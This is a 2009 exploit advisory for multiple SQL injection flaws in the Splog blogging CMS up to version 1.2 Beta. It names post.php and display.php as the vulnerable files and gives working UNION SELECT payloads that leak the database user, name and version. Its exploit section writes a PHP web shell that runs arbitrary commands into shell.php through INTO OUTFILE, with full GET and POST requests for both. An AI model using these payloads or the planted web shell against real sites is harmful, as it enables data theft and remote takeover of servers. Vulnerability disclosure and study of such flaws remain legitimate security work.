splog-sql.txt
Posted on 11 June 2009
----------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta--> ----------------------------------------------------------------- CMS INFORMATION: -->WEB: http://sourceforge.net/projects/splog/ -->DOWNLOAD: http://sourceforge.net/projects/splog/ -->DEMO: N/A -->CATEGORY: CMS / Blogging -->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing full integration into a website by being designed for use... -->RELEASED: 2009-06-01 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: N/A -->CATEGORY: SQL INJECTION -->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns) -->Discovered Bug date: 2009-06-08 -->Reported Bug date: 2009-06-09 -->Fixed bug date: 2009-06-10 -->Info patch (1.3): http://sourceforge.net/projects/splog/ -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### ------------------- PROOF OF CONCEPT: ------------------- <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> [++] GET var --> 'id' [++] File vuln --> 'post.php' ~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++] POST var --> 'pCategory' [++] File vuln --> 'display.php' POST http://[HOST]/[PATH]/display.php HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Referer: http://[HOST]/[PATH]/display.php Content-Type: application/x-www-form-urlencoded pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION [++[Return]++] ~~~~~> user, version or database. ---------- EXPLOIT: ---------- <<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>> [GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R--></title>','<body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','</h1></center><br><br><font color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2>','</font><h3>Command Result:</h3><?php system($_GET[cmd]); ?>','<br><br><font color=ff0000>','<h3>By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23 [POST]~~~~~> POST http://[HOST]/[PATH]/display.php HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Referer: http://[HOST]/[PATH]/display.php Content-Type: application/x-www-form-urlencoded pCategory=-1'+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R--></title>','<body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','</h1></center><br><br><font color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2>','</font><h3>Command Result:</h3><?php system($_GET[cmd]); ?>','<br><br><font color=ff0000>','<h3>By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION [++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################
